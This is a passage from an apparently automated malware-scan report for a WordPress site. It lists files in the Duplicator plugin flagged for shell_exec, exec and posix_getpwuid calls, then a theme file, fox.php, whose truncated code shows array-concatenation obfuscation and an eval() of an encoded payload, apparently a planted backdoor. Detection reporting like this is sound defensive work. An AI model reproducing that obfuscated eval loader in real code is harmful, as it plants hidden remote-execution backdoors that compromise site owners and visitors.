style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_ssdir</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$old_root_perm&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DupLiteSnapLibIOU</span><span style="color: #007700">::</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWindows</span><span style="color: #007700">()&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">strtoupper</span><span style="color: #007700">(</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">PHP_OS</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">))&nbsp;===&nbsp;</span><span style="color: #DD0000">'WIN'</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerUnscramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerScramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_DIE&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'die'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_THROW&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'throw'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_RETURN&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'return'</span><span style="color: #007700">;&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">hasCapability</span><span style="color: #007700">(</span><span style="color: #0000BB">$permis</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_199").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/classes/utilities/class.u.zip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_200" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$errorMessage&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_U</span><span style="color: #007700">::</span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;extracting&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">):&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$stderr</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #0000BB">$errorMessage</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$zipArchive&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">ZipArchive</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">open</span><span style="color: #007700">(</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;opening&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;when&nbsp;extracting.&nbsp;Error&nbsp;code:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$retVal</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extractTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$destinationDirectory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$relativeFilesToExtract</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_200").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/classes/package/class.pack.database.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_201" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">'Warning:&nbsp;Using&nbsp;a&nbsp;password&nbsp;on&nbsp;the&nbsp;command&nbsp;line&nbsp;interface&nbsp;can&nbsp;be&nbsp;insecure.'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #DD0000">"Ran&nbsp;from&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$exePath</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$tblCreateCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$tables</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$tblFilterCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$tblAllCount&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"FILTERED:&nbsp;[</span><span style="color: #007700">{</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">FilterTables</span><span style="color: #007700">}</span><span style="color: #DD0000">]"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"RESPONSE:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$output</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"TABLES:&nbsp;total:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblAllCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;filtered:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblFilterCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;create:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$sql_footer&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"\n\n/*&nbsp;Du...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_201").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/classes/class.db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_202" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$out</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$rc</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$rc&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">getTableCollationList</span><span style="color: #007700">(</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;try&nbsp;{&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">get_results</span><span style="color: #007700">(</span><span style="color: #DD0000">"SHOW&nbsp;TABLE&nbsp;STATUS&nbsp;FROM&nbsp;`</span><span style="color: #007700">{</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">dbname</span><span style="color: #007700">}</span><span style="color: #DD0000">`"</span><span style="color: #007700">);&nbsp;foreach(</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$key&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">))&nbsp;{&nbsp;if&nbsp;(!&nbsp;empty(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$collations</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_unique</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">SORT_STRING</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">ret</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_202").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/themes/html5blank-stable/tmp_files/fox.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2023-02-08 05:01:20</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span><br><table id="file_203" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_array <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">43</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">52</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">8</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">19</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">47</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">21</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">15</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">34</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">34</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #DD0000">'('&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">57</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">13</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">34</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">15</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">40</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">41</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #DD0000">'_'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">6</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">15</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">6</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #0000BB">$qRccm</span><span style="color: #007700">[</span><span style="color: #0000BB">15</span><span style="color: #007700">]&nbsp;.&nbsp;</span><span style="color: #DD0000">'(\''</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">$jV1Aq</span><span style="color: #007700">;&nbsp;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">CRgwR</span><span style="color: #007700">()&nbsp;.&nbsp;</span><span style="color: #DD0000">'eJy1eVcPxLjV3bO/X7ExFtjdjJFRL9jsg3oZ9S69GOpdo94M//fIa68NJAiQl1AYQbykLi8p8txzMHXxw8//rdiGdK2/w1/zs17W5eefqvyEknr46Zdf/vZff/qj9Yd/WX/+8XlY1vmXv/3wX3/604/DD7/98NS6/D8Nv/7esDx9f/vzn3/94Yffq/VvwGP/4V/lqOou//nH+n/+ODx+/lmeXn/6Mf7ht2VLHi9/ePvLj/VfoF9+/eE/5fd+6TPsGKftz38W//uf//Jj/M9B/1Q/83mG+g345W//DODH9Ne//96Sd0v+wz+N/+M/1h/r12/Q76/+Xp/zdZuHH37v9Q/rY/z7f/17Af56J93+849/jR2dT4hnhH89/Tvif9X/8nM9rL/8/Md6/QSDz0XAxLOev/z6//wS8HT/341QBqP/9vRHsP9y8Ovff/xrMIBo+dtPvwf60zMUVlxY+ttPSbzkGPLXLE+/Wf7T...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_203").DataTable();</script></td></tr></tbody></table>
    </div>
    <button onclick="scrollToTop()" id="back-top" class="bg-primary"><i class="fas fa-angle-up"></i></button>
  </body>
</html>